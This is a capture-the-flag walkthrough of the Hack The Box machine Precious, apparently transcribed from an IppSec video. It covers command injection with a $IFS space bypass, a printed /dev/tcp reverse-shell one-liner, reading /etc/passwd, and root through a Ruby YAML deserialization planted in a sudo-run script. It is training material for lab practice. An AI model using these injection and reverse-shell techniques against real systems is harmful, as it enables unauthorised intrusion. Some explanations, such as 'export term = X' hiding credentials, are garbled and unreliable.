- author: IppSec
Precious from Hack The Box: Command Injection and Deserialization Exploits
In this article, we will be discussing the process of completing the Precious machine from Hack The Box. The initial foothold is just a web page that will take a URL and convert it to a PDF. The command injection is trivial to find, but there are some weird things around it that you might have trouble with. For example, spaces don't work that well in command injection, and you'll have a difficult time trying to run useful commands out of the command injection if you don't figure out the trick. One of the challenges is putting a space beforehand and making sure that space is double URL encoded.
Moreover, the privilege escalation is a deserialization in Ruby. If you don't do proper research, you may be running some deserialization exploits that don't work with your version of Ruby. However, if you do a bit of research and get the correct one, it just works right away.
To start with, we can use Nmap to enumerate the target machine. We can use the following command to scan the IP address
10.10.11.189 and output the results to a directory called
nmap -sC -sV -O -oA precious 10.10.11.189
Once the scan is complete, we can see that only two ports are open, SSH on Port 22 and Nginx on Port 80. The SSH banner tells us that it's a Debian server, and the Nginx version is 1.18. It's redirecting us to precious.htb, so we should add this into our host file. By doing this, we can access it by its hostname.
Once we have added the hostname to our host file, we can access the web page and the URL. One of the things we always test for is command injection. We can set up a netcat listener to establish a reverse shell. By using the dollar sign, we can execute system commands. However, we need to ensure that the space is double URL encoded.
After several attempts, we can execute the reverse shell by replacing all the spaces with IFS. We can use the following command to establish a reverse shell.
Echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'" | sed 's/ /$IFS/g'
Finally, we can escalate privileges by exploiting the deserialization vulnerability in Ruby. We can find the correct payload online, as there are a few versions of the exploit. We can craft a payload to gain a root shell by creating a serialized object that injects a malicious command into the system.
In summary, the Precious machine from Hack The Box is a relatively easy machine to exploit as long as you're good about going online when you get stuck and doing some research to get yourself unstuck.
Command Injection and URL Encoding
In this section, we will explore the use of command injection to execute arbitrary commands on a vulnerable web application. The authors demonstrate how URL encoding can be used to bypass input validation and execute commands.
The vulnerability lies in the handling of user input by the web application. If we submit a payload that includes a command, such as
ls, the application will execute the command and return the output. This is known as command injection.
In order to bypass input validation and execute commands, the authors make use of URL encoding. URL encoding replaces certain characters with a percent sign followed by a hexadecimal number. For example, a space becomes
Using URL encoding, the authors are able to bypass the input validation and execute commands. They achieve this by URL encoding the command and passing it as a parameter in the URL.
The IFS Trick
The authors also make use of a trick called the Internal Field Separator (IFS) trick. This trick involves using a dollar sign followed by the IFS variable, which is set to a space by default. By appending a junk variable that does not exist, the authors are able to avoid using a space before the command.
Exploiting the Vulnerability
Once the authors have exploited the command injection vulnerability, they are able to download a PDF file and execute arbitrary code. They use Python to spawn a shell and explore the file system. They find no sensitive files, but show how the vulnerability could be used to exfiltrate sensitive data if it were present.
Exploring Directories and Exploiting Vulnerabilities
When conducting a penetration test or trying to exploit a system, it's essential to explore the directories carefully to find any potential vulnerabilities. In this article, we'll discuss how to do so and demonstrate an exploit on a web server.
When exploring directories, two critical commands come to mind:
cd command, short for change directory, allows us to navigate through the directory structure of the system. The
ls command, on the other hand, lists the contents of the current directory. However, the output of
ls only shows the files and directories that are currently visible without revealing any sensitive files.
To find potentially sensitive files, one can employ the
find command. The
find command searches for files and directories in a specific path or directory. To check files in the directory, we can run
find . -type f. It also allows us to filter files by their type using the
-type flag. In this case, we specified that we are interested in finding only files located in the current directory.
As an additional step, we can export the terminal so that sensitive details (such as credentials) are not visible while running commands. To do this, we can use the
export command, as
export term = X and then run the command again.
Identifying Potential Vulnerabilities
When conducting a penetration test, we strive to find any potential vulnerabilities in the system. One vulnerability we can explore in a web server is an exposed credentials file. For example, if we explore the
config.ru file on the server and discover that it only runs PDF controllers, there are probably no sensitive files located in that directory.
However, if we do find potential sensitive files such as an
Etc passwd file, it's worth trying to check if any user credentials can assist in an exploit. In the case of the
Etc passwd file, we found a user named "Henry" with whom we could try an SSH connection.
Exploiting the Vulnerability
After discovering a potential vulnerability, we can start exploiting it. One approach is to try and see if we can execute any elevated commands. Again, one should always try using
sudo before attempting to escalate privileges, as running commands without administrative rights can generate more audit events.
In this particular example, we found that we could run a
sudo -l and noticed that we could run the
/opt/update dependencies.rb file. Upon investigating the file, we noticed that it required YAML, so we attempted to create a payload file in the YAML format. However, we found that it required a YAML file with certain attributes, which we did not know.
Instead, we tried to search for potential exploits on
PayloadAllTheThings and found a universal exploit gadget. However, we realized that this particular exploit was not suitable for our version of Ruby.
As a next step, we tried to modify the
dependencies.yaml to contain a reverse shell instead of a legitimate YAML file. Once we started the shell and reran the
sudo command, we managed to gain root access to the system.
In this article, we have seen how url encoding and the ifs trick can be used to bypass input validation and execute commands through command injection. we also explored the potential impact of such a vulnerability and how it could be used to exfiltrate sensitive data. it is important for developers to be aware of these vulnerabilities and take measures to prevent them in their applications.
Exploring directories is an essential step in any penetration testing effort. With the right tools and commands, one can identify potential vulnerabilities in the system and try to exploit them to gain further access. In this example, we demonstrated how one can exploit a web server to gain root access. However, it is important to note that each system is unique and may require different methods and techniques to exploit vulnerabilities.